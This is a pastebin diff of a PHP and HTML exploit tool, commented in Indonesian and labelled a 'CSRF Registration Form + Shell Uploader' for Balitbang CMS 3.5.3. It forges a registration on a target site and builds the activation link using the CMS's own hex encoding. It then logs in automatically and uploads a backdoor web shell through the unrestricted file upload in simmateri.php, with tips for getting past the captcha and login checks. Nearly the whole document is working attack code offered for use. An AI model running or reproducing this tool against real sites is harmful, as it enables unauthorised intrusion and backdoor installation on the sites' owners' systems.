SHOW:
|
|
- or go back to the newest paste.
1 | <html> | |
2 | <!--- | |
3 | - | // script ini dibuat berdasarkan iseng saja... :) |
3 | + | // { Attacker Alone Cyber } |
4 | - | // by. kitasemua |
4 | + | // by. MR.V4N |
5 | // -------------------------- | |
6 | // Simpan script ini dengan nama: test.php | |
7 | // - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php" | |
8 | // - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya | |
9 | // - Format shell: *.phtml, *.php5 | |
10 | // -------------------------- | |
11 | // Bugs terletak pada /functons/simmateri.php dan /functions/simmateriguru.php | |
12 | // Cara menutup bugs ini: gunakan fungsi batasan ekstensi file seperti di /functions/simlapguru.php | |
13 | // -------------------------- | |
14 | // Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS". | |
15 | // -------------------------- | |
16 | --> | |
17 | <head> | |
18 | <title>Balitbang 3.5.3</title> | |
19 | </head> | |
20 | <style type="text/css"> | |
21 | input[type=text],input[type=code],input[type=password]{ | |
22 | border:1px solid #c0c0c0; | |
23 | height:24px; | |
24 | padding:5px; | |
25 | } | |
26 | </style> | |
27 | <body> | |
28 | <?php | |
29 | function hex($str='',$code='') { | |
30 | if(($code>=0)and($code<100)) { | |
31 | $t .=dechex(strlen($str)+$code)."g"; | |
32 | $str=strrev($str); | |
33 | for($i=0;$i<=strlen($str)-1;$i++) { | |
34 | $t .=dechex(ord(substr($str,$i,1))+$code); | |
35 | } | |
36 | } | |
37 | return $t; | |
38 | } | |
39 | function unhex($str='',$code='') { | |
40 | $all=explode("g",$str); | |
41 | $head=hexdec($all[0])-$code; | |
42 | $content=$all[1]; | |
43 | if($head==(strlen($content)/2)) { | |
44 | for($i=0;$i<=$head-1;$i++) { | |
45 | $t .=chr(hexdec(substr($content,$i*2,2))-$code); | |
46 | } | |
47 | $t =strrev($t); | |
48 | } | |
49 | return $t; | |
50 | } | |
51 | $target = $_GET['target']; | |
52 | $ur_target = $target."/member/membersave.php"; | |
53 | $ur_upload = $target."/functions/simmateri.php"; | |
54 | $captcha = $target."/functions/captcha/captcha.php"; | |
55 | $ur_login = $target."/member/ajax_login.php"; | |
56 | $userx = $_GET['n']; | |
57 | $passx = $_GET['p']; | |
58 | if(isset($_POST['next'])){ | |
59 | $tar = $_POST['tar']; | |
60 | $n = $_POST['n']; | |
61 | $p = $_POST['p']; | |
62 | header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar.""); | |
63 | } | |
64 | echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)<hr>"; | |
65 | ?> | |
66 | <form method="post" action="" enctype="multipart/form-data"> | |
67 | <table id=tablebaru cellspacing='1' cellpadding='3'> | |
68 | <tr> | |
69 | <td>target</td> | |
70 | <td>:</td> | |
71 | <td><input type="text" name="tar" size="61" placeholder='http://'/></td> | |
72 | </tr> | |
73 | <tr> | |
74 | <td>username</td> | |
75 | <td>:</td> | |
76 | <td><input type="text" name="n" size="61"/></td> | |
77 | </tr> | |
78 | <tr> | |
79 | <td>password</td> | |
80 | <td>:</td> | |
81 | <td><input type="text" name="p" size="61"/></td> | |
82 | </tr> | |
83 | <tr> | |
84 | <td></td> | |
85 | <td></td> | |
86 | <td><input type="submit" name="next" value="NEXT »"/></td> | |
87 | </tr> | |
88 | </table> | |
89 | </form> | |
90 | <hr> | |
91 | <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){ | |
92 | $asli = hex($userx,"82"); | |
93 | $pass = hex($passx,"82"); | |
94 | echo "username : <b>$userx</b><br>"; | |
95 | echo "password : <b>$passx</b><hr>"; | |
96 | ?> | |
97 | <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'> | |
98 | <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'> | |
99 | <input type=hidden name='name' value='ganteng'/> | |
100 | <input type=hidden name='username' value='<?php echo $userx;?>'/> | |
101 | <input type=hidden name='password' value='<?php echo $passx;?>'/> | |
102 | <input type=hidden name='email' value='abc@abc.abc'/> | |
103 | <input type=hidden name='kelamin' value='m'/> | |
104 | <input type=hidden name='jenis' value='Tamu'> | |
105 | <input type=hidden name='kelas' value=''/> | |
106 | <input type=hidden name='hari' value='01'/> | |
107 | <input type=hidden name='bulan' value='01'/> | |
108 | <input type=hidden name='tahun' value='1995'/> | |
109 | <input type=hidden name='nis' value=''/> | |
110 | <input type=hidden name='pertanyaan' value='1'/> | |
111 | <input type=hidden name='jawaban' value='1'/> | |
112 | <input type=hidden name='kerja' value='Guru'/> | |
113 | <input type=hidden name='alamat' value='jauh'/> | |
114 | <input type=hidden name='sekolah' value='terserah'/> | |
115 | <input type=hidden name='telp' value='0'/> | |
116 | <input type=hidden name='blog' value=''/> | |
117 | <input type=hidden name='tentang' value='terserah'/> | |
118 | <input type=hidden name='country' value='INDONESIA'/> | |
119 | <input type=hidden name='stprofil' value='open'/> | |
120 | <input type=hidden name='stblog' value='on'/> | |
121 | <table> | |
122 | <tr> | |
123 | <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td> | |
124 | <td rowspan="2" valign="top"><i>» capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td> | |
125 | </tr> | |
126 | <tr> | |
127 | <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td> | |
128 | <td valign="top"><input type=submit name='submit' value='GO »'/></td> | |
129 | </tr> | |
130 | </table> | |
131 | </form> | |
132 | <?php | |
133 | echo "<!-- | |
134 | ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass." | |
135 | --> | |
136 | "; | |
137 | echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!. | |
138 | <br><i>» capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='lewat sini brade!!'/><hr>"; | |
139 | } else if(isset($_GET['load']) && $_GET['load'] == "upload"){ | |
140 | ?> | |
141 | <script type="text/javascript"> | |
142 | window.onload = function(){ | |
143 | document.forms['login_form'].submit() | |
144 | ||
145 | } | |
146 | function setURL(url){ | |
147 | document.getElementById('verif').src = url; | |
148 | } | |
149 | </script> | |
150 | <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'> | |
151 | <input type='hidden' name='user_name' value="<?php echo $userx;?>"/> | |
152 | <input type='hidden' name='password' value="<?php echo $passx;?>"/> | |
153 | Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/> | |
154 | </form> | |
155 | <div style='margin-top:-20px;'> | |
156 | <iframe name='autologin' width='30' height='30' style="border:0;"></iframe> | |
157 | </div> | |
158 | <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'> | |
159 | <input type='hidden' name='pesan' value='abcabcabc'/></td> | |
160 | <table cellspacing='1' cellpadding='3'> | |
161 | <tr> | |
162 | <td valign='top'>File</td> | |
163 | <td valign='top'>:</td> | |
164 | <td valign='top'><input type='file' name='file'></td> | |
165 | <td valign='top' align='right'><input type='submit' value=' Simpan '/></td> | |
166 | </tr> | |
167 | <tr> | |
168 | <td valign='top' colspan="4"><i>» capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td> | |
169 | </tr> | |
170 | <tr> | |
171 | <td valign='top' colspan="4"> | |
172 | hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-ganteng.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.php5";?></a><br> | |
173 | hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td> | |
174 | </tr> | |
175 | </table> | |
176 | <input type=hidden name='st' value='ganteng'> | |
177 | <input type=hidden name='nis' value=''> | |
178 | <input type=hidden name='idtugas' value=''> | |
179 | </form> | |
180 | <hr> | |
181 | <?php } ?> | |
182 | </body> | |
183 | </html> |